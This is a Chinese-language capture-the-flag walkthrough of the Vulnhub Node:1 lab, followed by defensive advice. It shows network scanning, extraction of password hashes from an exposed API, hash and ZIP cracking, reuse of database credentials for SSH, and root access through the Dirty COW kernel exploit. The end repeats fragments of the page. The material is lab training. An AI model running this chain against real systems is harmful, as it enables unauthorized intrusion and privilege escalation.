Vulnhub Node:1 靶机渗透测试详解<\/h1>

1. 信息收集阶段<\/h2>

1.1 网络发现<\/h3>

使用 arp-scan<\/code> 工具发现目标IP：<\/p>

arp-scan -l
<\/span><\/span><\/code><\/pre>发现目标IP为 192.168.92.129<\/code><\/p>
1.2 端口扫描<\/h3>
使用 nmap<\/code> 进行端口探测：<\/p>
nmap -sV -p- 192.168.92.129
<\/span><\/span><\/code><\/pre>发现开放端口：<\/p>

22\/tcp - SSH服务<\/li>
3000\/tcp - Node.js Web服务<\/li>
<\/ul>
1.3 Web服务分析<\/h3>
访问 http:\/\/192.168.92.129:3000<\/code> 发现是一个Node.js编写的Web界面<\/p>
通过审计前端JavaScript代码，在 assets\/js\/app\/controllers\/home.js<\/code> 文件中发现敏感信息端点：<\/p>
\/\/ 代码中暴露了API端点
<\/span><\/span><\/span><\/span>\/api\/users\/latest\/<\/span>
<\/span><\/span><\/code><\/pre>2. 获取初始凭证<\/h2>
2.1 获取用户列表<\/h3>
访问 \/api\/users\/latest\/<\/code> 获取到用户凭证：<\/p>
{
<\/span><\/span>  "username"<\/span>: "mark"<\/span>,
<\/span><\/span>  "password"<\/span>: "5f4dcc3b5aa765d61d8327deb882cf99"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.2 密码破解<\/h3>
使用 hash-identifier<\/code> 判断加密方式为MD5（原文误写为SHA-256）：<\/p>
hash-identifier 5f4dcc3b5aa765d61d8327deb882cf99
<\/span><\/span><\/code><\/pre>使用在线工具破解得到密码为 password<\/code><\/p>
2.3 登录尝试<\/h3>
使用 mark:password<\/code> 登录系统，发现普通用户权限有限，提示：<\/p>
Only admin users have access to the control panel currently, but check back soon to test the standard user functionality!
<\/code><\/pre>
2.4 获取管理员账户<\/h3>
访问 \/api\/users\/<\/code> 获取完整用户列表，发现管理员账户：<\/p>
{
<\/span><\/span>  "username"<\/span>: "myP14ceAdm1nAcc0uNT"<\/span>,
<\/span><\/span>  "password"<\/span>: "dffc504aa55359b9265cbebe432e2b00"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>破解得到密码为 manchester<\/code><\/p>
3. 获取源代码<\/h2>
3.1 管理员功能<\/h3>
使用 myP14ceAdm1nAcc0uNT:manchester<\/code> 登录后，发现可以下载网站备份源码 myplace.zip<\/code><\/p>
3.2 破解ZIP密码<\/h3>
使用 fcrackzip<\/code> 进行字典破解：<\/p>
fcrackzip -u -D -p \/usr\/share\/wordlists\/rockyou.txt myplace.zip
<\/span><\/span><\/code><\/pre>得到密码：magicword<\/code><\/p>
解压源代码：<\/p>
unzip -P magicword myplace.zip
<\/span><\/span><\/code><\/pre>4. 代码审计与数据库访问<\/h2>
4.1 分析app.js<\/h3>
在解压的源代码中，app.js<\/code> 文件包含MongoDB配置信息：<\/p>
const<\/span> MongoClient<\/span> =<\/span> require<\/span>('mongodb'<\/span>).MongoClient<\/span>;
<\/span><\/span>MongoClient<\/span>.connect<\/span>('mongodb:\/\/mark:5AYRft73VtFpc84k@localhost:27017\/myplace?authSource=myplace'<\/span>);
<\/span><\/span><\/code><\/pre>4.2 SSH登录<\/h3>
使用发现的数据库凭证 mark:5AYRft73VtFpc84k<\/code> 成功SSH登录：<\/p>
ssh mark@192.168.92.129
<\/span><\/span><\/code><\/pre>5. 权限提升<\/h2>
5.1 系统信息收集<\/h3>
查看系统版本信息：<\/p>
lsb_release -a
<\/span><\/span>uname -a
<\/span><\/span><\/code><\/pre>输出显示系统为Ubuntu 16.04，内核版本4.4.0-21-generic<\/p>
5.2 漏洞利用<\/h3>
使用 searchsploit<\/code> 查找可用漏洞：<\/p>
searchsploit "Linux Kernel 4.4.0-21"<\/span>
<\/span><\/span><\/code><\/pre>发现存在脏牛(Dirty Cow)漏洞(CVE-2016-5195)<\/p>
5.3 上传并编译EXP<\/h3>
从攻击机上传EXP：<\/p>
scp 40847.cpp mark@192.168.92.129:\/tmp\/
<\/span><\/span><\/code><\/pre>在目标机器上编译：<\/p>
g++ -Wall -pedantic -O2 -std=<\/span>c++11 -pthread -o dcow 40847.cpp -lutil
<\/span><\/span><\/code><\/pre>5.4 执行提权<\/h3>
运行编译后的程序：<\/p>
.\/dcow
<\/span><\/span><\/code><\/pre>成功获取root权限<\/p>
6. 获取Flag<\/h2>
6.1 用户Flag<\/h3>
cat \/home\/tom\/user.txt
<\/span><\/span><\/code><\/pre>6.2 Root Flag<\/h3>
cat \/root\/root.txt
<\/span><\/span><\/code><\/pre>关键点总结<\/h2>

API端点发现<\/strong>：通过审计前端JavaScript代码发现敏感API端点<\/li>
密码破解<\/strong>：使用字典攻击破解MD5哈希和ZIP密码<\/li>
凭证复用<\/strong>：数据库凭证成功用于SSH登录<\/li>
内核漏洞利用<\/strong>：利用脏牛漏洞进行本地提权<\/li>
<\/ol>
参考工具列表<\/h2>

arp-scan<\/li>
nmap<\/li>
hash-identifier<\/li>
fcrackzip<\/li>
searchsploit<\/li>
scp<\/li>
g++<\/li>
<\/ul>
防御建议<\/h2>

避免在前端代码中暴露敏感API端点<\/li>
使用强密码策略，避免使用常见密码<\/li>
及时更新系统和内核补丁<\/li>
实现最小权限原则，避免凭证复用<\/li>
对敏感文件进行适当权限控制<\/li>
<\/ol>

Vulnhub Node:1 靶机渗透测试详解<\/h1>

1. 信息收集阶段<\/h2>

2. 获取初始凭证<\/h2>

3.1 管理员功能<\/h3> 使用 myP14ceAdm1nAcc0uNT:manchester<\/code> 登录后，发现可以下载网站备份源码 myplace.zip<\/code><\/p>

4. 代码审计与数据库访问<\/h2>

5. 权限提升<\/h2>

6. 获取Flag<\/h2>

防御建议<\/h2> 避免在前端代码中暴露敏感API端点<\/li> 使用强密码策略，避免使用常见密码<\/li> 及时更新系统和内核补丁<\/li> 实现最小权限原则，避免凭证复用<\/li> 对敏感文件进行适当权限控制<\/li> <\/ol>

3.1 管理员功能<\/h3>
使用 `myP14ceAdm1nAcc0uNT:manchester<\/code> 登录后，发现可以下载网站备份源码 myplace.zip<\/code><\/p>`

防御建议<\/h2>

避免在前端代码中暴露敏感API端点<\/li>
使用强密码策略，避免使用常见密码<\/li>
及时更新系统和内核补丁<\/li>
实现最小权限原则，避免凭证复用<\/li>
对敏感文件进行适当权限控制<\/li> <\/ol>